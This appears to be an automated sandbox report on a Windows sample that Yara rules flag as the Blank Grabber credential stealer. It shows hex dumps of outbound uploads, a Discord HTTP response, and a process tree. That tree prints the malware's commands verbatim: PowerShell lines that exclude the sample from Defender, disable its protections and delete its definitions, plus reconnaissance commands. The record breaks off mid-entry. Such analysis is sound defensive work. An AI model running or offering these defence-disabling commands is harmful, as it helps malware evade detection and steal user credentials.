                                                                                                                                                                                                                              2025-01-05 06:19:59 UTC16384OUTData Raw: 0d 55 b8 31 dd 9c 6a 17 87 2c ca 3d e4 a0 56 b8 50 60 9c 2c f5 c9 8f a9 bc bd b2 97 fb 47 73 20 c6 65 9e 30 c1 6f dd bb 85 ae 93 04 03 03 1c 3f 4d b2 8d ec 24 c8 2d 84 f0 a9 ec fc ca a6 af a5 f0 d1 7c 39 bf 18 a7 7b 0f 28 a1 15 fc ea 4d e1 20 af 30 b8 72 f3 35 df 41 d8 e9 5d e0 de f9 47 de 08 42 0a 79 d3 5d 33 d2 f5 18 c8 11 c9 ee 0c f4 cd 76 50 82 cf 5d 81 d4 95 e9 86 9a fa 65 64 9f 0a 09 47 b8 c7 cb 7b 2c ff 5f ab af d9 56 78 4a e9 a4 a4 c5 14 7f f0 9a 35 a9 84 89 20 1b 53 81 f7 f6 49 b9 ad 75 c0 ee dd b3 ab a9 e5 61 6f ad 1d 00 59 c8 ac 0c ea b8 e2 40 b6 fe c5 24 d9 51 68 d2 73 dd 5a 41 c0 a1 fb 26 cc d9 d3 dc 62 9c 6a 28 9f 8d 2c 29 08 14 81 af 68 70 24 69 c6 cc 3e 6c 32 c1 f3 83 8b 96 1e 73 97 e6 bc d5 91 30 3d 37 ab a9 64 46 06 c7 77 37 3c fa a0 3e
                                                                                                                                                                                                                              Data Ascii: U1j,=VP`,Gs e0o?M$-|9{(M 0r5A]GBy]3vP]edG{,_VxJ5 SIuaoY@$QhsZA&bj(,)hp$i>l2s0=7dFw7<>
                                                                                                                                                                                                                              2025-01-05 06:19:59 UTC16384OUTData Raw: 76 59 5b a1 f0 00 28 90 a1 58 00 92 2a dd b0 60 64 9d c9 b0 89 a4 e9 86 11 77 4f 81 61 66 f2 97 6b e4 c8 44 78 9c 4a ad cc da 93 f1 49 ba da f4 f0 46 17 25 08 ec c8 70 e5 70 45 89 d6 bd de d6 ee 9d dd 3b a3 96 88 d2 e6 11 07 18 87 8c 4e b4 d1 ae c6 af 77 2e 1e 5d 74 21 42 14 d2 a1 9e e8 59 f7 37 30 b9 0e 00 30 a9 63 73 97 6d 99 72 4b a8 2e d0 ca 5e 70 04 5f 95 97 7c 53 8b 90 a2 51 90 56 e3 62 80 7c 48 40 2d e5 75 d3 67 6e ca fe f6 0a ec d6 89 d9 29 eb 89 a1 aa e1 a6 9f a6 5c db de be a8 30 12 ae fd 3c 35 6f 69 67 55 3d 68 0d cf cf 31 28 f2 ee 9c e8 0e 13 b7 2f 74 1b 4f fb 63 68 22 63 3b 7d 6a cc 43 39 4a e7 1b 3f d2 d7 b9 c9 64 64 ba d5 c8 b4 43 f7 be 98 dd c1 3c 85 f4 c6 48 66 c9 67 72 3a cc 8a 4b a1 61 03 4e ce b8 31 8a 72 36 24 6f 5e 8b f8 3c 64 da 3b
                                                                                                                                                                                                                              Data Ascii: vY[(X*`dwOafkDxJIF%ppE;Nw.]t!BY700csmrK.^p_|SQVb|H@-ugn)\0<5oigU=h1(/tOch"c;}jC9J?ddC<Hfgr:KaN1r6$o^<d;
                                                                                                                                                                                                                              2025-01-05 06:19:59 UTC16384OUTData Raw: a4 3c 43 e2 0d 03 ae 94 49 e0 2d d9 bc ab d2 17 5c 90 6d cc 14 85 c3 dc f5 93 36 7d 50 f6 22 e6 68 02 23 de c8 48 e3 fc 07 68 99 9e 4c f4 7f d2 8d ae fc f8 3b 85 ef af 76 95 29 fa ee 69 08 79 33 e3 33 f1 e7 2d f7 ab 33 73 af 5c 8a ae 9c e1 72 d5 ed 89 a2 8b da f6 9c 40 35 c4 dd 5c cf df f5 20 67 9c ac e8 72 6b 89 b1 8b de 03 e2 15 67 90 16 99 a7 c6 4b 98 8a 57 08 54 10 91 ef 04 ed 89 e3 45 f1 6d 0b 54 8a 49 43 e0 f1 44 8c 51 2d 1e 64 ce 59 9f df 3f e1 2f 2e fe 48 5b de 6d 4f 1f 25 09 96 9c 0d fe 1e f3 80 0d 02 da 66 8a b7 10 6c df 8e f8 f2 db ed a5 5c 05 fb 5e 06 32 97 f6 cf a1 4e c1 96 f4 84 1b 93 9d 13 88 fc 6a d0 18 51 87 13 89 a1 4d 64 5e 6f 9a bc d2 74 fd 14 44 18 9c af 11 20 ba 5d a7 83 13 29 ba e4 fd 41 82 a0 bc df c5 11 6d c6 eb 5b 20 3c 6c 9f 2d
                                                                                                                                                                                                                              Data Ascii: <CI-\m6}P"h#HhL;v)iy33-3s\r@5\ grkgKWTEmTICDQ-dY?/.H[mO%fl\^2NjQMd^otD ])Am[ <l-
                                                                                                                                                                                                                              2025-01-05 06:19:59 UTC16384OUTData Raw: e8 d2 08 ce 63 86 aa 5a d2 5d e0 73 8c 13 1e ee 95 3f 16 57 2d dd e0 7b 78 a9 47 83 9f f9 47 fd 67 67 75 9e 67 69 20 77 db a5 6c 98 24 83 1f 8c d4 aa 43 10 df f7 10 2f 8b a6 53 87 1a a7 fb 95 76 7d 56 0a 43 3e e4 08 cd 65 fd c5 ba 47 8b 5d a2 a9 72 7b ea 13 0c 2a b2 b6 a6 7c 88 0c e5 32 ea ce f8 83 0e bf 53 10 9a cc 14 ad 79 ae e5 fb ce e7 3c d7 dd a9 f3 9c 87 fc d1 86 8c 2d 5c 88 ba 72 ed 4d 8e bf fe 51 b7 01 5d 0e 48 04 8c 69 69 54 c5 ea ed 0d 18 9c 27 bc 34 6d d5 03 8a f2 d9 68 35 26 14 ed 6e 60 ab d0 1b 33 23 e1 bd c9 75 85 f2 b0 8b 72 28 ea ef f1 45 db 7f 02 00 4f 7a ee 0a f0 ce 4a c8 6e 10 27 15 bc 0e 84 11 d4 3c b1 e0 d9 f6 e1 7e 58 10 b0 87 db 1d ff 1a 8e 26 d7 d2 a6 11 18 ec 9a 11 be 18 c0 85 69 b4 ce 47 1f 9d d3 79 fb 33 25 ed 39 5b 84 2b e4 6e
                                                                                                                                                                                                                              Data Ascii: cZ]s?W-{xGGggugi wl$C/Sv}VC>eG]r{*|2Sy<-\rMQ]HiiT'4mh5&n`3#ur(EOzJn'<~X&iGy3%9[+n
                                                                                                                                                                                                                              2025-01-05 06:19:59 UTC16384OUTData Raw: fc 6a 1d 59 12 63 89 91 62 eb c5 31 9d a2 1f a9 ca 64 40 d9 3f a0 0c 97 4e ff 75 9d c9 b6 2e 2d 78 9d 51 ff 77 c3 bc d2 36 be f9 b5 57 9e 8e d7 7f e7 c8 5b 88 7a a6 a5 f5 1e f5 5a 2e 93 cf fc 98 42 b0 36 0b 63 fe e7 b6 87 27 45 9e 11 94 97 9e df 2d 20 85 45 06 04 4a 30 08 1a 35 4f 5e fc b9 a7 71 d6 9b 8a 18 c1 a8 82 9a fd 45 69 da a0 e8 89 29 d7 9d 47 4d a5 0c c4 44 e6 44 81 c2 58 71 9d 7f 84 6d 79 35 8d 0b 93 74 6f f2 81 4b 4e b3 1e 48 d3 22 b0 dd 47 3a 2b 57 fe 64 a3 d1 95 d4 41 7d 93 14 d1 c4 e8 e2 95 5b 12 7d 3b 64 5b e1 fa 79 05 85 0a 2b 12 2d a3 cb c7 8b 48 8b d1 6f 23 ac 49 33 3a 02 99 34 96 b8 ca 44 24 e1 8d 20 ee 82 bb e5 29 fe 58 4c 57 cd 1f 52 57 72 ff 15 2d fc 1f 99 52 1f 0c e3 7d 88 8a cb ef a7 db b7 7d c2 50 22 ca ad 20 75 5d ab 47 e3 e9 41
                                                                                                                                                                                                                              Data Ascii: jYcb1d@?Nu.-xQw6W[zZ.B6c'E- EJ05O^qEi)GMDDXqmy5toKNH"G:+WdA}[};d[y+-Ho#I3:4D$ )XLWRWr-R}}P" u]GA
                                                                                                                                                                                                                              2025-01-05 06:20:00 UTC1257INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Sun, 05 Jan 2025 06:20:00 GMT
                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                              Content-Length: 45
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                              x-ratelimit-limit: 5
                                                                                                                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                                                                                                                              x-ratelimit-reset: 1736058001
                                                                                                                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                                                                                                                              via: 1.1 google
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zw5vSBldi9iOW%2B9eohdvopcKIAWFYHRKodKbFFkuEUzy6NjtAeQYt%2BV0q9gfoFdO%2F3nGXOF%2BcBDredMg2V2D2z5kQySEIm6wi2C5gtsOEXVdIv4eJe8aFfj1Uo95"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Set-Cookie: __cfruid=5cbfc4dd6375ebbad0e3f09fa787817f5ba62106-1736058000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                              Set-Cookie: _cfuvid=bS8fx30a016BJMMg6M7LZNH.avt_AGjRctIj0yxJamY-1736058000314-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8fd15c226cc4429d-EWR


                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:01:17:58
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\KpHYfxnJs6.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:9'081'534 bytes
                                                                                                                                                                                                                              MD5 hash:41B147FD16A94A8EA6164177CF91733C
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2051169917.00000000050F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2051169917.00000000050F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                              Start time:01:18:36
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\KpHYfxnJs6.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:9'081'534 bytes
                                                                                                                                                                                                                              MD5 hash:41B147FD16A94A8EA6164177CF91733C
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.2878432052.000000000838F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000002.2886083384.0000000007480000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()""
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"
                                                                                                                                                                                                                              Imagebase:0x7c0000
                                                                                                                                                                                                                              File size:13'312 bytes
                                                                                                                                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                              Imagebase:0xb00000
                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                              Start time:01:19:21
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                              Start time:01:19:21
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff70f330000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                              Start time:01:19:21
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                              File size:427'008 bytes
                                                                                                                                                                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                              Start time:01:19:25
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                              Start time:01:19:25
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                              Start time:01:19:25
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                              Imagebase:0xf0000
                                                                                                                                                                                                                              File size:59'392 bytes
                                                                                                                                                                                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                              Start time:01:19:25
                                                                                                                                                                                                                              Start date:05/01/2025
